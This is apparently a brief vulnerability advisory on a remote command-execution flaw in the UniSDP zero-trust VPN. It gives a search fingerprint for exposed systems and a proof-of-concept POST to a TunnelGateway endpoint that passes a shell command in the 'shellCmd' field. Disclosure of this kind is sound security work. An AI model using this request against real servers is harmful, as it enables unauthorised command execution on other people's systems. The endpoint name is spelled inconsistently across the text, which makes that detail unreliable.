Unisdp Software Defined Boundary System Commonretst Command Execution Vulnerability
Unisdp Software Defined Boundary System Commonretst Command Execution Vulnerability
UniSDP software-defined boundary system commonRetSt command execution vulnerability
Vulnerability Description
Liansoft Security UniSDP software-defined boundary system is a next-generation VPN based on zero trust. In the 2021.04.28 version of this system, there is a security vulnerability in a TunnelGateway interface. The vulnerability allows an attacker to send a specially crafted request to the server and execute remote commands.
Vulnerability Impact
UniSDP Software-defined Boundary System
Network surveying and mapping
title=”UniSSOView”
Vulnerability reappears
Login page
Verify POC
1
2
3
POST /TunnelGateway/commondRetStr
shellCmd=id
This post is licensed under CC BY 4.0 by the author.